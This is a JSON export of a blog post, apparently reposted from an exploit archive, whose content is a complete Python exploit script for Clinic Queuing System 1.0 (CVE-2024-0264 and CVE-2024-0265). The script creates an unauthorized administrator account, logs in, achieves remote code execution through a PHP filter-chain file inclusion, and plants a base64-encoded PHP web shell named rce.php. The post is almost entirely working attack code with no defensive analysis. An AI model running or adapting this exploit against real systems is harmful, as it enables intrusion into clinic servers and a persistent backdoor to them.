{"id":56717,"date":"2024-05-09T20:30:00","date_gmt":"2024-05-09T16:30:00","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178519\/clinicqs10-exec.txt"},"modified":"2024-05-09T20:30:00","modified_gmt":"2024-05-09T16:30:00","slug":"clinic-queuing-system-1-0-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/clinic-queuing-system-1-0-remote-code-execution\/","title":{"rendered":"Clinic Queuing System 1.0 Remote Code Execution"},"content":{"rendered":"<p># Exploit Title: Clinic Queuing System 1.0 RCE <br \/># Date: 2024\/1\/7<br \/># Exploit Author: Juan Marco Sanchez<br \/># Vendor Homepage: https:\/\/www.sourcecodester.com\/<br \/># Software Link: https:\/\/www.sourcecodester.com\/php\/16439\/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html<br \/># Version: 1.0<br \/># Tested on: Debian Linux Apache Web Server<br \/># CVE: CVE-2024-0264 and CVE-2024-0265<\/p>\n<p>import requests<br \/>import random<br \/>import argparse<br \/>from bs4 import BeautifulSoup<\/p>\n<p>parser = argparse.ArgumentParser()<br \/>parser.add_argument(&#8220;target&#8221;)<br \/>args = parser.parse_args()<\/p>\n<p>base_url = args.target<br \/>phase1_url = base_url + &#8216;\/LoginRegistration.php?a=save_user&#8217;<br \/>phase2_url = base_url + &#8216;\/LoginRegistration.php?a=login&#8217;<\/p>\n<p>filter_chain = &#8220;php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=home&#8221;<\/p>\n<p>def phase1(): # CVE-2024-0264<br \/>rand_user = &#8216;pwn_&#8217;+str(random.randint(100, 313))<br \/>rand_pass = &#8216;pwn_&#8217;+str(random.randint(100, 313))<br \/>pwn_user_data = {&#8216;formToken&#8217;:&#8221;,&#8217;fullname&#8217;:&#8217;pwn!&#8217;,&#8217;username&#8217;:rand_user,&#8217;password&#8217;:rand_pass,&#8217;status&#8217;:1,&#8217;type&#8217;:1}<br \/>print(&#8220;[*] adding administrator &#8221; + rand_user + &#8220;:&#8221; + rand_pass)<br \/>phase1 = requests.post(phase1_url, pwn_user_data)<br \/>if &#8220;User Account has been added successfully.&#8221; in phase1.text:<br \/>print(&#8220;[+] Phase 1 Success &#8211; Admin user added!\\n&#8221;)<br \/>print(&#8220;[*] Initiating Phase 2&#8221;)<br \/>phase2(rand_user, rand_pass)<br \/>else:<br \/>print(&#8220;[X] user creation failed :(&#8220;)<br \/>die()<\/p>\n<p>def phase2(user, password): # CVE-2024-0265<br \/>s = requests.Session();<br \/>login_data = {&#8216;formToken&#8217;:&#8221;,&#8217;username&#8217;:user, &#8216;password&#8217;:password}<br \/>print(&#8220;[*] Loggin in&#8230;.&#8221;)<br \/>phase2 = s.post(phase2_url, login_data)<\/p>\n<p>if &#8220;Login successfully.&#8221; in phase2.text:<br \/>print(&#8220;[+] Login success&#8221;)<br \/>else:<br \/>print(&#8220;[X] Login failed.&#8221;)<br \/>die()<\/p>\n<p>print(&#8220;[+] Preparing for RCE via LFI PHP FIlter Chaining&#8230;\\n&#8221;)<br \/>rce_url = base_url + &#8220;\/?page=&#8221; + filter_chain + &#8220;&amp;0=echo &#8216;|jmrcsnchz|&lt;pre&gt;&#8217;.shell_exec(&#8216;id&#8217;).'&lt;\/pre&gt;&#8217;;&#8221;<br \/>#print(&#8220;[*] Payload: &#8221; + rce_url)<br \/>rce = s.get(rce_url)<\/p>\n<p>if &#8220;jmrcsnchz&#8221; in rce.text:<br \/>print(&#8220;[+] RCE success!&#8221;)<br \/>soup = BeautifulSoup(rce.text, &#8216;html.parser&#8217;)<br \/>print(&#8220;[+] Output of id: &#8221; + soup.pre.get_text())<br \/>print(&#8220;[*] Uploading php backdoor&#8230;.&#8221;)<br \/>s.get(base_url + &#8220;\/?page=&#8221; + filter_chain + &#8220;&amp;0=file_put_contents(&#8216;rce.php&#8217;,base64_decode(&#8216;PD89YCRfR0VUWzBdYD8%2b&#8217;));&#8221;)<br \/>print(&#8220;[+] Access at &#8221; + base_url + &#8220;\/rce.php?0=whoami&#8221;)<br \/>else:<br \/>print(&#8220;[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.&#8221;)<br \/>die()<\/p>\n<p>try:<br \/>print(&#8220;[*] Initiating Phase 1&#8221;)<br \/>phase1()<br \/>except:<br \/>print(&#8220;Exploit failed.&#8221;)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Clinic Queuing System 1.0 RCE # Date: 2024\/1\/7# Exploit Author: Juan Marco Sanchez# Vendor Homepage: https:\/\/www.sourcecodester.com\/# Software Link: https:\/\/www.sourcecodester.com\/php\/16439\/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html# Version: 1.0# Tested on: Debian Linux Apache Web Server# CVE: CVE-2024-0264 and CVE-2024-0265 import requestsimport randomimport argparsefrom bs4 import BeautifulSoup parser = argparse.ArgumentParser()parser.add_argument(&#8220;target&#8221;)args = parser.parse_args() base_url = args.targetphase1_url = base_url + &#8216;\/LoginRegistration.php?a=save_user&#8217;phase2_url = &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56717","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56717","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56717"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56717\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56717"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56717"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56717"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}